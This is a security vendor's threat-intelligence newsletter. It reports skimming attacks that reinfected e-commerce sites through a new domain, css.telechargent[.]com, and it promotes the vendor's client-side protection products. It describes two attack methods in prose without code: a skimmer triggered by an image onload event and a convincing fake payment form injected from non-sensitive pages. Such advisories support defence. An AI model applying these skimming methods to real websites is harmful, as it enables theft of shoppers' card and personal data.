SOURCE DEFENSE RESEARCH INTELLIGENCE NEWS 

May 20, 2025

ATTACKERS STRIKE UNPROTECTED SITES - BECAUSE CLEANUP ALONE IS NOT ENOUGH

The Source Defense Research team has identified a troubling pattern: attackers are returning to previously compromised sites—this time leveraging a brand-new domain, css.telechargent[.]com, that was still clean on VirusTotal and other blacklists at the time of detection. Because this domain had no prior association with malicious activity, it operated under the radar.

These reinfections didn’t happen because attackers were unusually persistent—they occurred because the affected sites never deployed client-side protection after the initial breach. And in some cases, they only protected “sensitive” pages like checkout—leaving other pages exposed. Removing malicious code is not enough; without behavioral detection and real-time defenses, attackers can (and do) return—often with new infrastructure that bypasses traditional safeguards.

Attack details

The current attack was identified across multiple websites, employing two distinct and unrelated methods:

1. Silent Skimming via Image Onload Event
   • The malicious script is triggered by an onload event on an image element, a subtle method that runs JavaScript code without any user interaction or visible changes on the page.
   • This technique silently captures PCI and PII data during checkout processes and exfiltrates it without visual disruption.
   • This method was observed on several websites in the US.
2. Double-Entry Attack Variant
   • Targeting a prominent UK retailer previously compromised and profiled in our newsletter “Double-entry attack with convincing fake forms triggered from non-sensitive webpages” and expanded upon in our blog: "New Magecart Variant Targets UK Retailer in Stealthy Double-Entry Attack" 

• • Similar to the previous attack, the malicious code presents a fake payment form to capture sensitive data.
  • The attack fakes a polished payment form before the legitimate payment page, making it highly convincing at the time of entry. While users may later realize something was wrong (after seeing a different legitimate payment form), by then it is too late—their credit card information has already been stolen.
  • Critically, this malicious form is injected from a non-sensitive webpage—outside the scope of standard page-specific protections. This demonstrates that securing only payment pages leaves exploitable gaps in the site.

Only the double-entry attack method was found active again on the UK retailer's website, while the silent skimming tactic was found targeting other sites.

Ongoing evolution of the attack

This latest wave demonstrates two alarming trends:

• Infrastructure Adaptation: Attackers are actively rotating to new, unlisted domains like css.telechargent[.]com to sidestep blacklist defenses.
  
  
• Repeat Targeting: Once breached, a website remains a high-value target. Repeat attacks with updated methods are increasingly common.

Together, these underscore the need for continuous, real-time client-side monitoring and protection across the entire website—not one-time remediation.

How does Source Defense protect you from such attacks?

Source Defense provides proactive, always-on monitoring and prevention—stopping reinfection before it starts. Our Protect product automatically blocks malicious domains and prevents unauthorized behaviors across all website pages, not just the checkout.

Customers using our Detect product receive real-time alerts when suspicious behavior is detected, enabling them to take manual action. And for all customers, our Professional Services Team continuously monitors threat trends and proactively alerts those who might be impacted.

How will you be alerted?

When Source Defense detects such an attack, you will receive the following alerts:

• New Script Identified: Unknown or suspicious script detected.
• Loading from Blacklisted Domain: Detection of script sourced from a malicious domain.
• Sending Data to Blacklisted Domain: Detection of data exfiltration attempts.
• Accessing PII or PCI Data: Immediate alert for data access attempts.

These alerts will be visible in:

• The Bell Notification Center.
• The Dashboard Summary, highlighted in red.
• The Found in Blacklists and Script Behaviors widgets.

Cleanup is not enough. Protection must be continuous and cover all website pages—not just checkout. Attacks today can start from anywhere: login, cart, search, or seemingly harmless pages. Reinfections prove that without comprehensive, client-side controls in place, the same vulnerabilities remain open to exploitation.